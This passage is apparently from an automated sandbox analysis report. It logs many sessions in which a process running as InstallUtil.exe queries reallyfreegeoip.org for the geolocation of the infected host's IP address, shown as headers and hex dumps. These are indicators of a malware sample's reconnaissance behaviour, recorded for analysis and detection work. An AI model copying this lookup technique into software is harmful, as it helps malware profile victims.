                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WrAMZz%2FwMs0brYohEJprp9ja8aNOhaIn%2B0MApWoYIBieDp9ZvlUO0%2FtVOE27bVCPxH1rctT3apKNo26PpDg0etpIZ1XIasQPQJ%2FzbxajpKTU4QxkOm2GqrVWcWg0a%2F9r1eoiZHhR"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa4119f34346-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:18 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.649721188.114.97.34435392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:20 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:20 UTC710INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:20 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40924
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2HFU4vdCFV8%2BoCUcG%2BYRBAPWXcn0EoR0xbIXxG0AGgPqyTxY1xFCDstBtFgDZwRl%2Bku4E%2FJ0q2aNJlm0lvcIAaLXeWY%2BZiOtpiJwYFd0EM5mYD6tBLgtQheahz8pZ79Y3NH7ZD1"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa4d6f6d1921-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:20 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.649725188.114.97.34435392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:22 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:22 UTC706INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:22 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40926
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TpOzLWdmLmfw6jRr4WoeJA6Qpje31YIh50S1AkOuymdlKIdAE%2BMH1GINGtFjrvVrIKI2JnX9499YG6%2Fob4RBzw282l4Qffx1Y%2BgNsXQnqXRcRyUxbs0v5tAYA1459EN0TKfLpPbt"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa57d9d48c18-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:22 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.649728188.114.97.34435392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:24 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:24 UTC714INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:24 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40928
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z73fAyKgeyBC%2BpmICSwCzVD63wKrGsZvbKYsnb1%2BvV602a3w3ie%2FVq0gH03AJHYbJTKShxE7S%2BZa7agTn5pvdPYjvaRH3dXoCXQ5hQ%2Bk6dNpnse0zvDF8vGDP1n%2BLiTQHfRZ%2FOXN"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa648cea7d0b-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:24 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.649731188.114.97.34435392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:26 UTC708INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:26 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40930
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7E46UxPt0jzAtbCfXC9kEx5bCXtzdbcPnSpECHSdgFW%2FOQgFi3knVt5AR2BJOj%2FXuwTPOgkn1idYWfOH0pewKUaB5mmifi2O%2FSm%2Bm8npShVqUkmAs4qH6U7XRgL50av6C0gcqWK"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa70abac0f41-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:26 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.649733188.114.97.34435392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:27 UTC704INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:27 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40931
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cKbBad4DLzzP5PgHjXRUdTiFze9NNlwQrPA1jvIUso4ARUtPvy1UjidEuEwnpB1NFJNRzY85ANWZyYXTnNdhiu2DQ8sGKp6IaN6HNMO%2BV42svvVG5gKjcanOIeI135MDnK7Z%2Bsy0"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa7a59465e6d-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:27 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.649736188.114.97.34435392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:29 UTC702INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:29 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40933
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DM4n4i47%2FfySq20zplbNIR0wKHQO9XCK6qdJW9T5plwHZ7oKwC1gp4q7nGK1h7NZSisVDMTY80BpkNjUXeE70JSXs4EgE9DfChOnxn41U7EBANY19AwUeL68OKgW77QtC7hnQwpJ"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa83190b2363-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:29 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.649739188.114.97.34435392C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:30 UTC695INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:30 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: MISS
                          Last-Modified: Tue, 27 Aug 2024 18:03:30 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9x00RaiyGFNyMeBpsvJvqj7m%2Bu3pnuFSj7C6W7ozoI1GN6Qi5RVCC1Qu1XcqSJXPXvnQOJd0ATaiIUL5%2B5L%2Fe7jV8HClS1QKvMvj7qIzJbxF0mqRE8I14PxtchdXChXWuftxVju"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfa8add244d0d-BOS
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:30 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.649743188.114.97.3443948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:39 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-08-27 18:03:39 UTC716INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:39 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40943
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JsYb42AQ%2Br5FMyJAWO9d%2Bu%2BYAbn6pZK8G5%2BB18TSgAjJcBDN4BjJvsKWEnF5Tmvah%2FRv8rMSArbl5htQUug2Qn18h%2FXUL8wDijdOd5C8KXK1%2B8U7hDE8IlE%2B7RrZP2W3SslCGh5"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfac2eae543d5-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:39 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:39 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.649745188.114.97.3443948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:40 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:40 UTC704INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:40 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40944
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXeSNPPsKO3sOVIuCIUFtUTPBira8rvm6CGkvTDu7lDBQdsftn0lzoEFjBOnlzPFyswVeZSFkjJrxNXHk5CQfY%2BLYOr8sFoy4wwn4TlpKk4S%2B6Ck4THEZHJSBSXipSoIFWq8rLLB"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8b9dfac8be9c9e02-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-08-27 18:03:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                          2024-08-27 18:03:40 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.649747188.114.97.3443948C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-08-27 18:03:41 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                          Host: reallyfreegeoip.org
                          2024-08-27 18:03:41 UTC710INHTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:41 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 40945
                          Last-Modified: Tue, 27 Aug 2024 06:41:16 GMT
